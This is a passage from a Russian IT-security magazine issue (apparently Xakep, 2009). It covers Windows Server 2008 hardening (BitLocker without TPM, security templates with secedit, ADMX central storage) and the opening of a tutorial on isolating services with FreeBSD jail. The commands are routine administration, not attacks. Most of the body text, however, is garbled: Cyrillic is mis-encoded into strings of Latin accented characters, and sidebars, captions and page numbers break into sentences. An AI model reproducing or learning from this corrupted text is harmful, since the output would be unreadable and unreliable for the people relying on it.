файлов .adm в 

.admx, а также для 

создания и редактирования 

готовых 

.admx используй 

бесплатную 

программу ADMX 

Migrator, которую 

можно найти на 

сайте Microsoft. 

• Обновленная консоль 

GPO в Win2k3/ 

Win2k8 позволяет 

работать 

с ADMX-файлами. 

• В Win2k8 сертификаты, 

позволяющие 

получить доступ к 

зашифрованным данным, 

можно хранить 

на смарт-картах. 

• BitLocker не шифрует 

метаданные, 

загрузочные и поврежденные 

сектора. 

108 

Сертификат, сгенерированный при включении EFS 

Òàê êàê èçíà÷àëüíî ìåõàíèçì øèôðîâàíèÿ çàâÿçàí íà èñïîëüçîâàíèè 

TPM, â ñèñòåìàõ, ãäå îí îòñóòñòâóåò, ïðèäåòñÿ 

âûïîëíèòü åùå ðÿä øàãîâ, ÷òîáû àêòèâèðîâàòü BitLocker. 

Äëÿ ýòîãî âûçûâàåì «Ðåäàêòîð ãðóïïîâîé ïîëèòèêè» 

(gpedit.msc) è ïåðåõîäèì â «Ðåäàêòîð ëîêàëüíîé ïîëèòèêè 

— Àäìèíèñòðàòèâíûå øàáëîíû — Êîìïîíåíòû Windows» 

(Group Policy Object Editor — Administrative — Templates 

— Windows Component). Âûáèðàåì ïóíêò «Øèôðîâàíèå 

äèñêà BitLocker» (BitLocker Encryption) è äâàæäû ùåëêàåì 

«Óñòàíîâêà ïàíåëè óïðàâëåíèÿ: âêëþ÷èòü äîïîëíèòåëüíûå 

ïàðàìåòðû çàïóñêà». Â ïîÿâèâøåìñÿ îêíå óñòàíàâëèâàåì 

ïåðåêëþ÷àòåëü â ïîëîæåíèå «Âêëþ÷èòü» è àêòèâèðóåì ôëàæîê 

«Ðàçðåøèòü èñïîëüçîâàíèå BitLocker áåç ñîâìåñòèìîãî 

TPM». Òåïåðü âìåñòî TPM ìîæíî èñïîëüçîâàòü êëþ÷ çàïóñêà 

íà USB-óñòðîéñòâå. Çàêðûâàåì ðåäàêòîð, ÷òîáû íîâûå 

íàñòðîéêè ãðóïïîâûõ ïîëèòèê âñòóïèëè â ñèëó, è ââîäèì 

êîìàíäó «gpupdate.exe /force». 

Â ñîñòàâ Win2k8 âõîäèò äîïîëíèòåëüíûé êîìïîíåíò «Óäàëåííîå 

óïðàâëåíèå BitLocker» (BitLocker-RemoteAdminTool), 

êîòîðûé ìîæíî óñòàíîâèòü áåç âêëþ÷åíèÿ BitLocker íà èñïîëüçóåìîì 

ñåðâåðå. Äëÿ ýòîãî äîñòàòî÷íî ââåñòè êîìàíäó: 

> ServerManagerCmd -install RSAT-BitLocker 

ШАБЛОНЫ БЕЗОПАСНОСТИ Íåñìîòðÿ íà ñâîå ãðîçíîå 

íàçâàíèå, øàáëîíû áåçîïàñíîñòè (Security Templates) ïðåäñòàâëÿþò 

ñîáîé îáû÷íûå òåêñòîâûå ôàéëû ñ ðàñøèðåíèåì 

.inf. Â íèõ ñîäåðæàòñÿ ãîòîâûå íàñòðîéêè áåçîïàñíîñòè: 

ëîêàëüíûå ïîëíîìî÷èÿ, ÷ëåíñòâî â ëîêàëüíûõ ãðóïïàõ (â 

Активировать EFS очень просто 

èäåàëå, ïîëüçîâàòåëè íå äîëæíû ÿâëÿòüñÿ ÷ëåíàìè ãðóïï, 

äàþùèõ áîëüøå ïðàâ, ÷åì èì â äåéñòâèòåëüíîñòè íóæíî), 

ðàçðåøåíèÿ äëÿ äîñòóïà ê ñåðâèñàì, ôàéëàì, êàòàëîãàì è 

ðàçäåëàì ðååñòðà. Ñ èõ ïîìîùüþ ìîæíî íå òîëüêî óêàçàòü, 

÷òî òîëüêî ïîëüçîâàòåëü user10 èìååò ïðàâî âûïîëíèòü 

äåéñòâèå X íàä îáúåêòîì Y, íî è ëåãêî âåðíóòü ñèñòåìó ê äåôîëòîâûì 

ñèñòåìíûì óñòàíîâêàì. Ýòî ìîæåò áûòü ïîëåçíî, 

êîãäà ïîñëå íåêîòîðûõ èçìåíåíèé ñèñòåìà ïåðåñòàëà íîðìàëüíî 

ôóíêöèîíèðîâàòü. Íàñòðîèâ øàáëîíû áåçîïàñíîñòè, 

èõ çàòåì ìîæíî ëåãêî âíåäðèòü ïðè ïîìîùè ãðóïïîâûõ 

ïîëèòèê (Group Policy) ñðàçó íà íåñêîëüêî ñåðâåðîâ èëè äàæå 

íà âñå êîìïüþòåðû äîìåíà. 

Â Win2k3 èñïîëüçîâàëîñü äåâÿòü øàáëîíîâ (íàéäåøü èõ â 

êàòàëîãå %systemroot%\security\templates) — êàæäûé îòâå÷àë 

çà ñâîé ó÷àñòîê íàñòðîåê. Íàïðèìåð, âñå íàñòðîéêè, 

ñâÿçàííûå ñ áåçîïàñíîñòüþ, íàõîäèëèñü â Secure*.inf-ôàéëàõ. 

Â Win2k8 âñåãî òðè ãëàâíûõ ôàéëà, â êîòîðûõ ñîäåðæàòñÿ 

øàáëîíû íàñòðîåê òèïè÷íûõ ñöåíàðèåâ èñïîëüçîâàíèÿ 

ñèñòåìû: 

1. Defltbase.inf — áàçîâûå/îáùèå íàñòðîéêè. 

2. Defltsv.inf — íàñòðîéêè, ñïåöèôè÷íûå äëÿ ñåðâåðîâ. 

3. Defltdc.inf — íàñòðîéêè, ñïåöèôè÷íûå äëÿ êîíòðîëëåðîâ 

äîìåíà. 

È ãëàâíîå: èçìåíåíî ðàñïîëîæåíèå ôàéëîâ — òåïåðü îíè íàõîäÿòñÿ 

â %systemroot%\inf ñðåäè ìíîæåñòâà äðóãèõ ôàéëîâ, 

èìåþùèõ ðàñøèðåíèå inf. Ýòî íåñêîëüêî çàòðóäíÿåò ïîèñê 

íóæíîãî øàáëîíà. Åñòü åùå ðÿä äîïîëíèòåëüíûõ ôàéëîâ äëÿ 

ðåøåíèÿ óçêîñïåöèàëèçèðîâàííûõ çàäà÷, íàïðèìåð, dcfirst. 

inf ñëåäóåò ïðèìåíÿòü ïðè ñîçäàíèè ïåðâîãî ÊÄ â ëåñó. Íî 

XÀÊÅÐ 04 /124/ 09

SYN/ACK 

Месторасположение шаблонов безопасности в Win2k8 

изменено 

Анализ существующих настроек при помощи MMC 

èìåííî òðè óêàçàííûõ âûøå øàáëîíà ÿâëÿþòñÿ îñíîâíûìè, 

è èõ ìîæíî èñïîëüçîâàòü äëÿ ïðèìåíåíèÿ ïîëèòèêè âðó÷íóþ 

ïðè ïîìîùè óòèëèòû secedit. 

×òîáû ïðîàíàëèçèðîâàòü áåçîïàñíîñòü êîìïüþòåðà, èñïîëüçóÿ 

øàáëîíû áåçîïàñíîñòè, çàïóñêàåì êîíñîëü MMC, 

âûáèðàåì «Äîáàâëåíèå è óäàëåíèå îñíàñòêè» è ïðèñîåäèíÿåì 

îñíàñòêó «Àíàëèç è íàñòðîéêà áåçîïàñíîñòè». Ïîÿâèòñÿ 

ïóñòîå ðàáî÷åå îêíî, äàëåå ñëåäóåì ïîäñêàçêàì. Âûáèðàåì 

â êîíòåêñòíîì ìåíþ ïóíêò «Îòêðûòü áàçó äàííûõ», òàê êàê 

áàçû ó íàñ ïîêà íåò, ñîçäàåì åå, ââåäÿ ëþáîå èìÿ ôàéëà. Ïî 

çàïðîñó èìïîðòèðóåì îäèí èç øàáëîíîâ áåçîïàñíîñòè, êîòîðûé 

áóäåì èñïîëüçîâàòü â äàëüíåéøåì. ×òîáû ïðîàíàëèçèðîâàòü 

ñèñòåìó, ïåðåõîäèì â êîíòåêñòíîå ìåíþ «Àíàëèçèðîâàòü 

êîìïüþòåð». Ïî îêîí÷àíèè àíàëèçà áóäóò âûâåäåíû 

âñå òåêóùèå íàñòðîéêè. Êñòàòè, ïîäîáíûå óñòàíîâêè ìîæíî 

ïîëó÷èòü è ïðè ïîìîùè óòèëèòû «gpresult /v», âûâîäÿùåé 

ïàðàìåòðû ãðóïïîâîé è ðåçóëüòèðóþùåé ïîëèòèêè (RSOP). 

Åñëè òû çíàêîì ñ GPO (Group Policy Objects), ìîæåøü ñðàâíèòü 

ýòè óñòàíîâêè ñ øàáëîíîì áåçîïàñíîñòè. 

Äàëåå ïðîñìàòðèâàåì íàñòðîéêè, ïðè íåîáõîäèìîñòè âíîñÿ 

èçìåíåíèÿ. Íàñòðîéêè ñèñòåìû, íå ñîîòâåòñòâóþùèå 

øàáëîíó, áóäóò îòìå÷åíû êðàñíûì êðåñòèêîì. Âûçâàòü äëÿ 

ðåäàêòèðîâàíèÿ íóæíûé ïóíêò ìîæíî äâîéíûì êëèêîì. Â 

ìåíþ «Ïîêàçàòü ôàéë æóðíàëà» áóäóò ïîêàçàíû âñå ïðîàíàëèçèðîâàííûå 

ïàðàìåòðû è ñîîòâåòñòâèå íàñòðîåê ñèñòåìû 

âûáðàííîìó øàáëîíó áåçîïàñíîñòè. 

Âíåñåííûå ñåé÷àñ èçìåíåíèÿ íèêàê íå ïîâëèÿþò íà òåêóùèå 

íàñòðîéêè êîìïüþòåðà, — îíè áóäóò çàíåñåíû òîëüêî â áàçó 

äàííûõ. Ïðè íåîáõîäèìîñòè âñå óñòàíîâêè ìîæíî ýêñïîðòèðîâàòü 

â ôàéë *.inf äëÿ ïðèìåíåíèÿ â äðóãèõ ñèñòåìàõ. ×òîáû 

çàäåéñòâîâàòü øàáëîí, âûáèðàåì â êîíòåêñòíîì ìåíþ 

ïóíêò «Íàñòðîèòü êîìïüþòåð» è óêàçûâàåì íà ìåñòî ñîõðàíåíèÿ 

ôàéëà æóðíàëà, êîòîðûé áóäåò ïîêàçàí ïî îêîí÷àíèè 

ðàáîòû óòèëèòû. 

Îòêàò íîâûõ óñòàíîâîê èç MMC íå ïðåäóñìîòðåí. ×òîáû çàðåçåðâèðîâàòüñÿ, 

ñîõðàíè ïåðâîíà÷àëüíóþ áàçó èëè íåïîñðåäñòâåííî 

ïåðåä ïðèìåíåíèåì èñïîëüçóé secedit ñ ïàðàìåòðîì 

GenerateRollback: 

> secedit /GenerateRollback /CFG Defltsv.inf / 

RBK Rollback.inf /log RollbackLog.log 

XÀÊÅÐ 04 /124/ 09 

ADM/ADMX ШАБЛОНЫ Àäìèíèñòðàòèâíûå øàáëîíû 

(ôàéëû ôîðìàòà .adm) ïîçâîëÿþò àäìèíèñòðàòîðó ïîñðåäñòâîì 

ãðóïïîâîé ïîëèòèêè êîíôèãóðèðîâàòü ñèñòåìíûé ðååñòð 

êëèåíòñêèõ êîìïüþòåðîâ. Ýòî çíà÷èò, ÷òî äëÿ ëþáîãî 

êëèåíòà, ïîäïàäàþùåãî ïîä äåéñòâèå íåêîòîðîãî îáúåêòà 

GPO, ñèñòåìíûé ðååñòð áóäåò ñêîíôèãóðèðîâàí â ñîîòâåòñòâèè 

ñ àäìèíèñòðàòèâíûì øàáëîíîì (îïðåäåëåííûì â ðàìêàõ 

äàííîãî îáúåêòà). 

ADM-ôàéëû õðàíÿòñÿ ëîêàëüíî íà êîìïüþòåðàõ, ïîäêëþ- 

÷åííûõ ê äîìåíó, è âèäíû â øàáëîíå ãðóïïîâîé ïîëèòèêè 

(GPT). Ïîñëåäíèé íàõîäèòñÿ â SYSVOL è ðåïëèöèðóåòñÿ íà 

îñòàëüíûå ñèñòåìû. Â èòîãå ìû ïîëó÷àëè ìíîæåñòâî îäèíàêîâûõ 

ôàéëîâ è ïîëíîå îòñóòñòâèå êîíòðîëÿ âåðñèé. Ïîçäðàâëÿþ, 

òåïåðü îá ýòèõ ïðîáëåìàõ ìîæíî çàáûòü :). 

Íà÷èíàÿ ñ Vista, â ÎÑ Windows èñïîëüçóåòñÿ íå òîëüêî 

íîâûé ôîðìàò àäìèíèñòðàòèâíûõ øàáëîíîâ íà áàçå 

XML — ôàéëû .admx, íî è ôóíêöèîíèðóþò îíè íåñêîëüêî 

èíà÷å. Ôàéëû ADMX õðàíÿòñÿ â öåíòðàëüíîì õðàíèëèùå, 

è â GPO íàïðÿìóþ íè÷åãî íå çàïèñûâàåòñÿ. Ýòî 

ïîçâîëÿåò óìåíüøèòü ðàçìåð SYSVOL è îáúåì ðåïëèöèðóåìûõ 

äàííûõ. Ïðè èçìåíåíèè â îäíîì èç ôàéëîâ 

ADMX èíôîðìàöèÿ êîïèðóåòñÿ íà äðóãèå ñèñòåìû. ×òîáû 

óïðîñòèòü ñîçäàíèå ëîêàëèçîâàííûõ îïèñàíèé (ðàíåå 

äëÿ êàæäîãî ÿçûêà èñïîëüçîâàëñÿ ñâîé ADM), ñòðîêîâûé 

ðàçäåë ôàéëà ADMX âûíåñåí â îòäåëüíûé ôàéë 

ADML. Êñòàòè, øàáëîíû ADM ïîääåðæèâàþòñÿ ïî-ïðåæíåìó, 

íî èñïîëüçîâàòü öåíòðàëèçîâàííîå õðàíèëèùå 

äëÿ íèõ íåëüçÿ. 

Ñîçäàòü öåíòðàëüíîå õðàíèëèùå â äîìåíå íåñëîæíî. Ïåðåõîäèì 

íà ÊÄ â êàòàëîã SYSVOL\Policies è êîïèðóåì ñþäà ñîäåðæèìîå 

C:\Windows\PolicyDefinitions, âêëþ÷àÿ ÿçûêîâûå 

ïîäêàòàëîãè ñ ADML-ôàéëàìè (â ëîêàëèçîâàííîé âåðñèè 

en_US è ru_RU). Ïîñëå ýòîãî ðåäàêòîð îáúåêòîâ óâèäèò ýòè 

ôàéëû è áóäåò ê íèì îáðàùàòüñÿ; ëîêàëüíûå æå — èãíîðèðóþòñÿ. 

Äëÿ ïðåîáðàçîâàíèÿ ôàéëîâ ADM â ADMX, à òàêæå äëÿ ñîçäàíèÿ 

è ðåäàêòèðîâàíèÿ ãîòîâûõ ADMX íåîáõîäèìà áåñïëàòíàÿ 

ïðîãðàììà ADMX Migrator, êîòîðóþ ìîæíî íàéòè ïîèñêîì 

íà ñàéòå Microsoft. Äëÿ ðåäàêòèðîâàíèÿ ADMX ïîäîéäåò 

è ëþáîé èç XML-ðåäàêòîðîâ, êîèõ ñåãîäíÿ íà ïîðÿäîê áîëüøå, 

÷åì ñïåöèàëèçèðîâàííûõ ðåäàêòîðîâ ADM. z 

links 

• Подробнее о TPM 

устройствах читай на 

странице Wikipedia: 

ru.wikipedia.org/wiki/ 

Trusted_Platform_ 

Module. 

• Дополнительные 

сведения 

об особенностях 

алгоритма шифрования 

BitLocker (на 

английском языке) 

смотри в статье «AES- 

CBC + диффузор 

Elephant» по адресу 

— go.microsoft.com/ 

fwlink/?LinkId=82824. 

• Для подготовки 

диска перед использованием 

BitLocker 

Microsoft рекомендует 

утилиту BitLocker 

Drive Preparation Tool 

(support.microsoft. 

com/kb/933246). 

• В Сети существуют 

специальные ресурсы 

вроде GPanswers. 

com, где можно 

получить файлы ADM/ 

ADMX. 

109

SYN/ACK 

ЕВГЕНИЙ «J1M» ЗОБНИН 

/ ZOBNIN@GMAIL.COM / 

Узник 

тайной тюрьмы 

Используем FreeBSD Jail для изолирования небезопасных сервисов 

FreeBSD хороша в качестве серверной ОС — поломать ее непросто 

даже в базовой конфигурации. Но не всякое ПО может похвастаться 

такой же надежностью и оперативностью исправления ошибок. Поэтому 

на важных серверах принято использовать jail, который запирает 

небезопасное стороннее ПО на замок, не позволяя взломщику навредить 

операционной системе. 

>> SYN/ACK 

ОТ ПЕСОЧНИЦЫ ДО ТЮРЬМЫ — ОДИН 

ШАГ Ïî ïîðó÷åíèþ ðóêîâîäñòâà òû ïîäíèìàåøü 

êîðïîðàòèâíûé ftp-ñåðâåð, äîëãî íàñòðàèâàåøü 

ïðàâà äîñòóïà, íàïîëíÿåøü êîíòåíòîì, 

çàáîòëèâî îêðóæàåøü ôàéðâîëîì è ñ ÷óâñòâîì 

âûïîëíåííîãî äîëãà îòïðàâëÿåøüñÿ äîìîé, à 

íàóòðî îáíàðóæèâàåøü íà ãëàâíîé ñòðàíè÷êå 

êîðïîðàòèâíîãî ïîðòàëà çëîáíóþ íàäïèñü «You 

are hacked!». «×òî çà áðåä», — äóìàåøü òû, ïûòàÿñü 

îáíàðóæèòü ñëåäû è ñïîñîá ïðîíèêíîâåíèÿ, 

êîòîðûì îêàçûâàåòñÿ… åñòåñòâåííî, óÿçâèìûé 

ftp-ñåðâåð. Äèðåêòîð êàê âñåãäà çàæàë äåíåã íà 

âûäåëåííóþ ìàøèíó äëÿ ftp-ñåðâåðà, è ïîýòîìó 

ïðèõîäèòñÿ ëàòàòü äûðû è íàäåÿòüñÿ, ÷òî â 

ñëåäóþùèé ðàç òû âîâðåìÿ íàêàòèøü âàæíûå 

îáíîâëåíèÿ. 

Ýòî — íåñêîëüêî íàäóìàííàÿ ïðîâèíöèàëüíàÿ 

èñòîðèÿ, íî îíà õîðîøî îòðàæàåò ñóòü ïðîáëåìû. 

Ñèñòåìà îêàçûâàåòñÿ áåççàùèòíîé ïåðåä 

âçëîìùèêîì: ñêîìïðîìåòèðîâàâ îäèí èç ñåðâèñîâ, 

çëîóìûøëåííèê àâòîìàòè÷åñêè ïîëó÷àåò 

ïîëíûé äîñòóï êî âñåì îñòàëüíûì. È äàæå åñëè 

ñëóæáà ðàáîòàåò ñ ïðàâàìè íåïðèâèëåãèðîâàííîãî 

ïîëüçîâàòåëÿ (÷òî ïîä÷àñ íåâîçìîæíî), 

ãðàìîòíûé ñïåöèàëèñò ñìîæåò èñïîëüçîâàòü 

èìåþùèåñÿ ïðàâà äëÿ èññëåäîâàíèÿ ñèñòåìû, 

ïîâûøåíèÿ ïðàâ ÷åðåç ëîêàëüíûå óÿçâèìîñòè 

èëè óñòàíîâêè ðàçëè÷íûõ áýêäîðîâ. 

Íåâîëüíî íàïðàøèâàåòñÿ ìûñëü îá îòäåëåíèè 

îïàñíîãî ñåðâèñà îò ÎÑ, åãî èçîëÿöèè, ïîìåùåíèè 

â áåçîïàñíóþ ñðåäó, èç êîòîðîé îí íå ñìîæåò 

íàâðåäèòü îñíîâíîé ñèñòåìå. Òàêîé èçîëÿòîð 

íàçûâàåòñÿ «ïåñî÷íèöåé» è ðåàëèçóåòñÿ ñ ïîìîùüþ 

ñèñòåìíîãî âûçîâà chroot(2), êîòîðûé 

çàñòàâëÿåò ïðèëîæåíèå äóìàòü, ÷òî óêàçàííûé 

â àðãóìåíòå êàòàëîã — ýòî êîðåíü ôàéëîâîé 

ñèñòåìû. Êàê ðåçóëüòàò, çàïóùåííàÿ ïðîãðàììà 

ðàáîòàåò â êàòàëîãå /usr/chroot (äëÿ ïðèìåðà) 

è íå ìîæåò íàâðåäèòü îñíîâíîé ñèñòåìå (âåäü 

ïîäíÿòüñÿ íà êàòàëîã âûøå êîðíÿ íåëüçÿ). Ïåñî÷íèöà 

õîðîøî ïîäõîäèò äëÿ ñåðâèñîâ, ðàáîòàþùèõ 

ñ ïðàâàìè ðÿäîâûõ ïîëüçîâàòåëåé, íî, 

êàê òîëüêî ïðîãðàììà ïîëó÷àåò ïðèâèëåãèè 

root, âñå ðóøèòñÿ. Ñóïåðïîëüçîâàòåëü îñòàåòñÿ 

ïðè ñâîèõ ïðàâàõ è â chroot, ìîæåò çàãðóæàòü 

ìîäóëè ÿäðà, ìîíòèðîâàòü ôàéëîâûå ñèñòåìû 

è äåëàòü âñå, ÷òî äóøà ïîæåëàåò. Ïîýòîìó äëÿ 

«îñîáî îïàñíûõ» èçîëÿòîð óæå íå ïîäõîäèò, — 

íóæíà íàñòîÿùàÿ òþðüìà! 

ЗА РЕШЕТКОЙ Тåõíîëîãèÿ jail áàçèðóåòñÿ íà 

ñèñòåìíîì âûçîâå chroot, íî îòëè÷àåòñÿ òåì, 

÷òî ñóùåñòâåííî îãðàíè÷èâàåò ñóïåðïîëüçîâàòåëÿ 

â ïðàâàõ. Íàõîäÿñü «çà ðåøåòêîé», root íå 

èìååò ïðàâ: 

1. Çàãðóæàòü ìîäóëè ÿäðà è êàêèì-ëèáî îáðàçîì 

ìîäèôèöèðîâàòü ÿäðî (íàïðèìåð, ÷åðåç /dev/ 

kmem). 

2. Èçìåíÿòü ïåðåìåííûå ÿäðà (çà èñêëþ÷åíèåì 

kern.securelevel è kern.hostname). 

3. Ñîçäàâàòü ôàéëû óñòðîéñòâ. 

4. Ìîíòèðîâàòü è äåìîíòèðîâàòü ôàéëîâûå ñèñòåìû. 

5. Èçìåíÿòü ñåòåâûå êîíôèãóðàöèè. 

6. Ñîçäàâàòü raw ñîêåòû (ïîâåäåíèå íàñòðàèâàåòñÿ). 

7. Ïîëó÷àòü äîñòóï ê ñåòåâûì ðåñóðñàì, íå àññîöèèðîâàííûì 

ñ IP-àäðåñîì jail’à. 

8. Ðàáîòàòü ñ System V IPC (ïîâåäåíèå íàñòðàèâàåòñÿ). 

9. Ïðèñîåäèíÿòüñÿ ê ïðîöåññó è èñïîëüçîâàòü 

ptrace(2). 

Â jail ñóïåðïîëüçîâàòåëü ïðåâðàùàåòñÿ â êàïðèçíîãî 

ðåáåíêà, êîòîðûé, õîòü è íå ìîæåò 

íàâðåäèòü êîðíåâîé ñèñòåìå, áåç îñîáûõ ïðîáëåì 

ââåäåò ÎÑ â ñòóïîð ïîëíîé íàãðóçêîé íà 

ïðîöåññîð èëè ñîæðåò âñþ äîñòóïíóþ ïàìÿòü. 

Ê ñîæàëåíèþ, ïðîòèâ ïîäîáíîãî âàíäàëèçìà çàùèòû 

ïîêà íåò. Êàê íåò è ïðîòèâ òåõ, êòî çàõî÷åò 

èñïîëüçîâàòü èçîëèðîâàííûé ñåðâèñ â êîðûñòíûõ 

öåëÿõ, áóäü òî ðàññûëêà ñïàìà èëè õðàíèëèùå 

âàðåçà. Òþðüìà îòëè÷íî ðåøàåò ïðîáëåìó 

ïðîíèêíîâåíèÿ â îñíîâíóþ ñèñòåìó, íî ñàìà ïî 

ñåáå àáñîëþòíî áåççàùèòíà. 

Ïåðåä òåì, êàê ïîìåñòèòü âûáðàííûé ñåðâèñ â 

jail, ìû äîëæíû ñîçäàòü äëÿ íåãî âñå íåîáõîäèìûå 

óñëîâèÿ, ýäàêóþ øâåéöàðñêóþ òþðüìó, 

ãäå êîìôîðòíî, êàê äîìà. Äëÿ ýòîãî âíóòðü âûáðàííîãî 

êàòàëîãà íåîáõîäèìî ïîìåñòèòü ìèíèìàëüíóþ 

êîïèþ êîðíåâîé ñèñòåìû, — ÷òîáû 

ñåðâèñ ñìîã íàéòè íåîáõîäèìûå åìó êàòàëîãè, 

áèáëèîòåêè è êîíôèãóðàöèîííûå ôàéëû (îêðóæåíèå 

èñïîëíåíèÿ). Ñàìûé ïðîñòîé ïóòü — 

ïðîñòî ñêîïèðîâàòü âñå íåîáõîäèìîå èç ñóùåñòâóþùåé 

ñèñòåìû, íî îí ÷ðåâàò îøèáêàìè, è åñòü 

ðèñê ïîëó÷èòü «ãðÿçíîå» îêðóæåíèå, êîòîðîå 

îòðàçèò íåêîòîðûå àñïåêòû ðåàëüíîé ñèñòåìû 

è ïîìîæåò âçëîìùèêó. Ïîýòîìó ëó÷øå ñîáðàòü 

«÷èñòîå» îêðóæåíèå èç èñõîäíûõ òåêñòîâ è óñòàíîâèòü 

â âûáðàííûé êàòàëîã. Òàê ñåðâèñ ïîëó- 

÷èò ñðåäó â äåôîëòîâîé êîíôèãóðàöèè, íè÷åãî 

íå ãîâîðÿùåé î ñîñòîÿíèè ðåàëüíîé ñèñòåìû. 

110 

XÀÊÅÐ 04 /124/ 09

SYN/ACK 

FreeBSD 

Jail 

ШАГ 1. СОЗДАНИЕ JAIL-ОКРУЖЕНИЯ 

Ïåðåõîäèì â êàòàëîã /usr/src è âûïîëíÿåì ñëåäóþùóþ 

ïîñëåäîâàòåëüíîñòü êîìàíä: 

# JAIL=/usr/jail/base 

# mkdir -p $JAIL 

# make world DESTDIR=$JAIL 

# make distribution DESTDIR=$JAIL 

# mount -t devfs devfs $JAIL/dev 

Ïîñëå èõ èñïîëíåíèÿ êàòàëîã /usr/jail/base 

áóäåò ñîäåðæàòü ÷èñòîå áàçîâîå îêðóæåíèå 

FreeBSD, âêëþ÷àÿ âèðòóàëüíóþ ôàéëîâóþ ñèñòåìó 

/dev. 

ШАГ 2. НАСТРОЙКА КОРНЕВОЙ СИСТЕМЫ 

Èäåì äàëüøå. Jail-îêðóæåíèÿ âî FreeBSD ðåàëèçîâàíû 

÷åðåç ïðèâÿçêó ê IP-ïñåâäîíèìàì 

ñåòåâûõ èíòåðôåéñîâ, ïîýòîìó, âî-ïåðâûõ, ìû 

äîëæíû íàçíà÷èòü àëèàñ èíòåðôåéñó, ñìîòðÿùåìó 

«íàðóæó», à âî-âòîðûõ, ñäåëàòü òàê, ÷òîáû 

ñåðâèñû êîðíåâîé ñèñòåìû ñëóøàëè ïîðòû 

òîëüêî íà ñâîåì IP è «ïðîïóñêàëè ìèìî óøåé» 

òðàôèê, ïðåäíàçíà÷åííûé ñåðâèñó â jail. 

IP-ïñåâäîíèìû äëÿ ñåòåâûõ èíòåðôåéñîâ íàçíà- 

÷àþòñÿ ñ ïîìîùüþ êîìàíäû: 

# ifconfig ed0 inet alias 

192.168.0.1/16 

×òîáû êîìàíäà èñïîëíÿëàñü âî âðåìÿ çàãðóçêè, 

äîáàâëÿåì åå â /etc/rc.conf: 

# echo "ifconfig_ed0_alias0=\"inet 

192.168.0.1\"" >> /etc/rc.conf 

Íè÷åãî ñòðàøíîãî, åñëè â òâîåì ðàñïîðÿæåíèè 

íåò âòîðîãî ãëîáàëüíî ìàðøðóòèçèðóåìîãî 

IP-àäðåñà, — ïîäîéäåò ëþáîé àäðåñ èç ÷àñòíîãî 

äèàïàçîíà (10.0.0.0/8, 172.16.0.0/12, 

192.168.0.0/16), òðàôèê íà êîòîðûé ìû çàâåðíåì 

ñ ïîìîùüþ áðàíäìàóýðà. 

Òåïåðü î íàñòðîéêå ñåðâèñîâ êîðíåâîé ñèñòåìû. 

Åñëè òû âñå-òàêè ðåøèë ïðèâÿçàòü jail êî âòîðîìó 

âíåøíåìó IP-àäðåñó, ñîçäàâ êàê áû èëëþçèþ 

âòîðîãî ñåðâåðà â ñåòè, òåáå ïðèäåòñÿ íàñòðîèòü 

âñå ñåðâèñû êîðíåâîé ñèñòåìû íà ïðîñëóøèâàíèå 

òîëüêî ïåðâîãî IP-àäðåñà. Èíà÷å ìîæíî 

ïîéìàòü êîíôëèêòû ìåæäó ïðèëîæåíèÿìè, 

ñëóøàþùèìè îäèí ïîðò (íàïðèìåð, ssh âíóòðè 

òþðüìû è â êîðíåâîé ñèñòåìå). Â áîëüøèíñòâå 

XÀÊÅÐ 04 /124/ 09 

111

SYN/ACK 

info 

• Чтобы научить ipfw 

делать fwd, придется 

пересобрать ядро 

с опцией 

IPFIREWALL_ 

FORWARD. 

Переменные, влияющие на jail-окружения 

• В следующем номере 

мы рассмотрим, 

как на основе jail поднять 

сервис по сдаче 

в аренду виртуальных 

FreeBSD-машин. 

Не пропусти! 

ñëó÷àåâ ñäåëàòü ýòî ìîæíî ÷åðåç ðåäàêòèðîâàíèå êîíôèãóðàöèîííîãî 

ôàéëà èëè ïóòåì óêàçàíèÿ ñïåöèàëüíûõ ôëàãîâ: 

# echo "inetd_flags=\"-wW -a \"">> /etc/rc.conf 

Ê íåñ÷àñòüþ, íåêîòîðûå ñåðâèñû (rpcbind, nfsd, mountd) íå 

ïîçâîëÿþò óêàçàòü ïðîñëóøèâàåìûé èìè IP-àäðåñ, ïîýòîìó 

ïîñòàðàéñÿ íå çàïóñêàòü èõ â áàçîâîé ñèñòåìå è jail-îêðóæåíèè 

îäíîâðåìåííî. Ñ ëîêàëüíûì IP-àäðåñîì ýòîãî äåëàòü íå 

ïðèäåòñÿ, òàê êàê jail-ñåðâèñû èçâíå äîñòóïíû íå áóäóò. Çàòî 

ïðèäåòñÿ ïîçàáîòèòüñÿ îá îðãàíèçàöèè ôîðâàðäèíãà ñ ïîìîùüþ 

áðàíäìàóýðà (ïðèìåð äëÿ ssh): 

# ipfw add fwd 192.168.0.1,22 tcp from any to 

âíåøíèé-ip 22 

ШАГ 3. НАСТРОЙКА JAIL-ОКРУЖЕНИЯ 

Ðàáîòàþùåå jail-îêðóæåíèå ïðåäñòàâëÿåò ñîáîé ïî÷òè òî÷íóþ 

êîïèþ íàñòîÿùåé FreeBSD è äàæå çàãðóæàåòñÿ ÷åðåç 

çàïóñê ñòàðòîâîãî ñêðèïòà /etc/rc. Â òî æå âðåìÿ âíóòðè jail 

äåéñòâóþò ñâîè îãðàíè÷åíèÿ è îñîáûå ïðàâèëà, êîòîðûå íåîáõîäèìî 

ó÷èòûâàòü. Ïîýòîìó âõîäèì â òþðüìó: 

sendmail_enable="NO" 

sendmail_submit_enable="NO" 

sendmail_outbound_enable="NO" 

sendmail_msp_queue_enable="NO" 

sshd_enable="YES" 

Ïîñëå òîãî, êàê âñå áóäåò ñäåëàíî, âûõîäèì èç îêðóæåíèÿ, 

íàáðàâ exit èëè íàæàâ . 

Â ñëó÷àå èñïîëüçîâàíèÿ ëîêàëüíîãî IP-àäðåñà äëÿ òþðüìû, 

åãî ñåòåâîå èìÿ ìîæåò áûòü ëþáûì. Íî åñëè jail ïðèâÿçàí ê 

âíåøíåìó IP, ïîòðåáóåòñÿ, êîíå÷íî æå, âûáðàòü íàñòîÿùåå 

äîìåííîå èìÿ, ïðîïèñàííîå â DNS-çîíàõ. 

Ïðèìåð èëëþñòðèðóåò çàïóñê ssh-ñåðâåðà âíóòðè jail-îêðóæåíèÿ, 

íî ÷òî, åñëè íóæíîãî ñåðâèñà íåò â áàçîâîì äèñòðèáóòèâå? 

Ïðîùå âñåãî — óêàçàòü ïóòü óñòàíîâêè ÷åðåç ïåðåìåííóþ 

PREFIX âî âðåìÿ óñòàíîâêè ïîðòà: 

# make PREFIX=/usr/jail/base make install clean 

Äëÿ ïàêåòîâ: 

# pkg_add -P /usr/jail/base ïàêåò-1.0.0.tbz 

Äëÿ ïîëüçîâàòåëåé portinstall: 

112 

# jail /usr/jail/base base.jail 192.168.0.1 / 

bin/sh 

